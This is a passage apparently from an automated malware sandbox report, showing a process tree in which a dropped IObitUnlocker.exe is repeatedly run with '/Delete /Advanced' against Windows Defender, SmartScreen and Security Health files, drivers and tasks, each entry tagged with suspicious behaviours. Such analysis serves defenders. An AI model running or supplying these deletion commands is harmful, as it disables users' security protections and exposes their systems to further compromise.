Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5112
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:312
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4056
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2464
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2112
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3356
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5912
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3028
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2396
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5536
-
-
C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exeC:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
